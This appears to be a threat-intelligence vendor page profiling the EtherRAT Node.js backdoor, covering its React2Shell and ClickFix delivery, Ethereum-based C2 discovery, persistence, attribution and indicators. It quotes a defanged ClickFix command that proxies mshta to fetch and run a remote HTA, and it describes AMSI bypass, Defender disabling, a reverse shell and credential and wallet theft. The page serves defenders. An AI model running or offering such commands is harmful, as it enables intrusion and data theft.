EtherRAT
EtherRAT is a Node.js-based remote access trojan/backdoor that has been observed on both Linux and Windows. It was first reported in December 2025 in React2Shell (CVE-2025-55182) exploitation against Linux servers, where it was delivered through shell scripts that downloaded a legitimate Node.js runtime, decrypted staged JavaScript payloads, and established persistence via systemd, XDG autostart entries, crontab, .bashrc, and .profile. On Windows, later campaigns delivered EtherRAT through malicious MSI installers, including trojanized IT tools such as Tftpd64 and fake GitHub repositories impersonating administrative utilities like PsExec, AzCopy, Sysmon, LAPS, Kusto Explorer, RAMMap, and others. Additional reporting also described distribution via PowerShell and JavaScript scripts, open directories, and ClickFix-driven chains using the Potemkin loader.
A core characteristic of EtherRAT is blockchain-based command-and-control discovery. Multiple reports state that it retrieves or resolves its live C2 address from the Ethereum blockchain using public Ethereum RPC endpoints, making traditional domain takedown and IP blocking less effective. Reported Ethereum-related indicators include smart contract addresses 0x22f96d61cf118efabc7c5bf3384734fad2f6ead4, 0x88ea8d0bc4146f0a018e989df3fd089ac48f9a58, 0xb3f2897f2bc797e5b9033faef8c81e92b01cb831, and 0xc12c8d8f9706244eca0acf04e880f10ff4e52522, with associated storage/lookup values including 0xE941A9b283006F5163EE6B01c1f23AA5951c4C8D and 0x40b57c3622c1CbfD699207F71F2dE5A8Fe256893. Observed live or resolved C2 infrastructure included 91.215.85.42:3000, resumeacceptable[.]com, and domains such as wpuadmin[.]shop. Samples used randomized polling paths under /api/ with common static-content extensions and in some cases an X-Bot-Server header. Reported build IDs include 6f816d80-0d6c-4384-9cd6-6b79965fc08f and ab653feb-9e78-4578-87ed-2e30329fe858.
Functionally, EtherRAT gives an operator full control of an infected machine and can execute arbitrary JavaScript or code returned by its C2. Reported behaviors include host reconnaissance, collection of system locale, GPU details, antivirus products, Active Directory domain membership, MachineGuid values, logged-in session status, and other environment details. Some analyses observed self-reobfuscation or self-update behavior in which the malware sent its own source code to the server and overwrote itself with a newly obfuscated version, causing hash churn. Windows variants commonly persisted through HKCU\Software\Microsoft\Windows\CurrentVersion\Run and launched via conhost.exe --headless invoking node.exe with obfuscated payload files; Linux variants used multiple user-level persistence mechanisms.
Follow-on payloads delivered through EtherRAT have included scripts for host reconnaissance, credential and wallet theft, React2Shell scanning and exploitation, web-server hijacking, and SSH key persistence. One reported JavaScript stealer collected cryptocurrency wallets, SSH keys, cloud credentials, tokens, database secrets, and browser-stored data from Windows and Linux systems, with exfiltration to /crypto/keys on its C2. In enterprise intrusions, EtherRAT was also used alongside other tooling such as Potemkin, RMMProject, TukTuk, Cloudflare tunnels, Chisel, WMIExec, SMBExec, and ransomware deployment chains. Reporting states that attackers spread EtherRAT laterally to more than 11 hosts in at least one Windows intrusion and ultimately disabled Windows Defender.
Targeting described in the content includes Linux servers vulnerable to React2Shell, enterprise administrators, DevOps engineers, security analysts, IT administrators, and network professionals. Industries and victims mentioned across reporting include insurance, e-commerce, IT, manufacturing, logistics, and broader enterprise environments. Several sources describe targeted attacks rather than indiscriminate commodity deployment.
Attribution remains mixed and should be treated cautiously. Sysdig reported a possible North Korean-linked actor and noted tradecraft overlap with DPRK Contagious Interview tooling and BeaverTail-style loaders. Other reporting described campaigns as suspected linked to a DPRK APT. Separately, Atos referenced external reporting that linked EtherRAT or related EtherHiding logic to Lazarus-associated activity and noted code commonalities with Tsundere malware found in infrastructure attributed by eSentire to MuddyWater (APT34). These links are reported assessments rather than definitive attribution in the provided content.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
The threat actors leveraged the CVE‑2025‑55182 (React2Shell) vulnerability... React2Shell is a vulnerability in the Flight protocol, which facilitates client-server communication for React Server Components. The vulnerability stems from insecure deserialization... Under certain conditions, this can enable an attacker to execute arbitrary code on the server. | Additionally, React2Shell attacks were recorded to distribute new EtherRAT malware, which was previously analyzed by Sysdig Threat Research Team.
Groups observed using it
4 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
A multi-stage attack chain distributing ransomware following a Malware infection with EtherRAT and TukTuk malware was identified, and some attack methods and infrastructure were exposed through internal leaks.
Ultimately, Atos Researchers identified it to be an EtherRat malware, a recently emerging threat using Ethereum to store C2 URL addresses, preventing takedown of the infrastructure.
this payload, dubbed EtherRAT, represents something far more sophisticated. It is a persistent access implant that combines techniques from at least three documented campaigns into a single, previously unreported attack chain.
“this payload, dubbed EtherRAT… is a persistent access implant… EtherRAT leverages Ethereum smart contracts for command-and-control (C2) resolution…”
Techniques & procedures
28 distinct techniques documented for this family, organized by ATT&CK tactic.
Execution
6 techniques
Execution
The first mechanism was a scheduled task to retrieve and execute EtherRAT called msiInstall2... The attacker then established a second scheduled task named ekShell2
File Path C:\Windows\Temp\D0OK1nWwId9W.ps1 First malicious PowerShell script dropped ... File Path C:\ProgramData\p\fsjH6IHuUkhh.ps1 AMSI bypass + Defender registry disable + reflective Chisel load
cmd /min /c "pcalua.exe -a mshta.exe -c hxxps://cl.distritovagas.com/hte[.]hta"
RlLF3rizah.ini is the loader JavaScript, MseKOytIWeVrP85.xml is the encrypted payload... Decrypting MseKOytIWeVrP85.xml with the cipher above yields the payload: EtherRAT, a Node.js backdoor.
ClickFix is a social engineering trick that presents users with a fake troubleshooting instruction on a compromised website. The prompt tells the user to press Win+R, paste a command into the Windows Run dialog, and hit Enter.
The attack started with a ClickFix command that abused pcalua.exe to proxy mshta.exe, fetching a remote HTA file from cl.distritovagas[.]com. That HTA payload silently downloaded the MSI installer, inst24.msi, from an attacker-controlled server and executed it without any prompt.
Persistence
3 techniques
Persistence
The first mechanism was a scheduled task to retrieve and execute EtherRAT called msiInstall2... The attacker then established a second scheduled task named ekShell2
They cycled through AMSI patches, registry policy writes... File Path C:\ProgramData\p\ek_full.ps1 Registry-based Defender disable script
The MSI deployed Potemkin into the user’s AppData folder and registered a startup registry key so it would survive every reboot. ... Registry Key HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RunSearch Potemkin loader persistence key ... HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EdgeUpdate EtherRAT persistence key
Privilege Escalation
2 techniques
Privilege Escalation
The first mechanism was a scheduled task to retrieve and execute EtherRAT called msiInstall2... The attacker then established a second scheduled task named ekShell2
The MSI deployed Potemkin into the user’s AppData folder and registered a startup registry key so it would survive every reboot. ... Registry Key HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RunSearch Potemkin loader persistence key ... HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EdgeUpdate EtherRAT persistence key
Stealth
8 techniques
Stealth
MseKOytIWeVrP85.xml is the encrypted payload... Potemkin protects two categories of strings with a custom byte cipher
After startup, the RAT sends its own source code to the C2 server. The C2 responds with a newly obfuscated version of the script, which is written back to disk, making each execution generate a new file hash.
The Cloudflare cloudflared client, renamed to svchost.exe to pose as a Windows process... Persistence was registered under the user Run key ... EdgeUpdate
The dc() function reads MseKOytIWeVrP85.xml and decrypts it into JavaScript with a custom byte cipher
The HTA payload hides its window, uses WScript.Shell to run curl silently downloading an MSI from an attacker-controlled domain... then executes it via msiexec /qn for silent installation.
Defense Impairment
1 technique
Defense Impairment
Discovery
4 techniques
Discovery
After the EtherRAT execution, we observed different post-compromised cmd.exe activities to check the environment. For example: powershell ... “(Get-WmiObject Win32_VideoController).Name” ... “(Get-WmiObject Win32_ComputerSystem).Domain” ... “(Get-WmiObject Win32_ComputerSystem).PartOfDomain”
Lateral Movement
2 techniques
Lateral Movement
Command and Control
7 techniques
Command and Control
EtherRAT is a RAT developed in Node.js which allows an attacker to gain complete control over the machine and execute arbitrary code returned by the Command and Control (C2) server.
For each candidate domain, Potemkin sends an HTTP GET request to a fixed URL path... EtherRAT enters an endless polling loop. Each request goes to a freshly randomized URL
Five hours later, the attacker dropped EtherRAT and set up a Cloudflare tunnel using a renamed copy of cloudflared... A reverse shell on port 43301 and multiple Chisel SOCKS tunnels gave them layered persistence
A reverse shell on port 43301 and multiple Chisel SOCKS tunnels gave them layered persistence that could survive individual detections.
That script downloaded and installed an MSI package in the background with no visible indication to the user. Separately, the attacker deployed EtherRAT... Five hours later, the attacker dropped EtherRAT and set up a Cloudflare tunnel using a renamed copy of cloudflared.
IOCs tracked for this family
149 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
69 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A remote access trojan deployed later in the intrusion, associated here with follow-on compromise activity and disabling Windows Defender.
Remote access malware used in a multi-stage attack chain that preceded ransomware deployment.
A Node.js backdoor/RAT that retrieves its C2 server address from the Ethereum blockchain. It was spread to more than 11 hosts and used for persistent access, with registry-based persistence masquerading as an Edge updater.
A remote access trojan delivered by Potemkin and propagated laterally across multiple hosts after initial compromise.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.